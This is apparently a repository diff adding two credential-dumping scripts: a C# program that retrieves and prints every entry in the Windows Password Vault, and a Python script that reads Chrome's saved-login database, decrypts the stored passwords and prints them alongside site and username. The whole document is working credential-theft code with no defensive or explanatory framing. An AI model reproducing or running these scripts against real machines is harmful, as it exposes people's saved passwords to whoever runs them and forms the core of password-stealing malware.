pickfire · June 22, 2013 12:57 · Jun 21, 2013 · Jun 13, 2013
diff --git a/ie_extract.cs b/ie_extract.cs
@@ -0,0 +1,33 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+using Windows.Security.Credentials;
+
+namespace PasswordVaultTest
+{
+    class Program
+    {
+        static void Main(string[] args)
+        {
+            // Create a handle to the Widnows Password vault
+            Windows.Security.Credentials.PasswordVault vault = new PasswordVault();
+            // Retrieve all the credentials from the vault
+            IReadOnlyList<PasswordCredential> credentials = vault.RetrieveAll();
+            // The list returned is an IReadOnlyList, so there is no enumerator.
+            // No problem, we'll just see how many credentials there are and do it the
+            // old fashioned way
+            for (int i = 0; i < credentials.Count; i++)
+            {
+                // Obtain the credential
+                PasswordCredential cred = credentials.ElementAt(i);
+                // "Fill in the password" (I wish I knew more about what this was doing)
+                cred.RetrievePassword();
+                // Print the result
+                Console.WriteLine(cred.Resource + ':' + cred.UserName + ':' + cred.Password);
+            }
+            Console.ReadKey();
+        }
+    }
+}
diff --git a/chrome_extract.py b/chrome_extract.py
@@ -0,0 +1,16 @@
+from os import getenv
+import sqlite3
+import win32crypt
+
+# Connect to the Database
+conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data")
+cursor = conn.cursor()
+# Get the results
+cursor.execute('SELECT action_url, username_value, password_value FROM logins')
+for result in cursor.fetchall():
+  # Decrypt the Password
+	password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
+	if password:
+		print 'Site: ' + result[0]
+		print 'Username: ' + result[1]
+		print 'Password: ' + password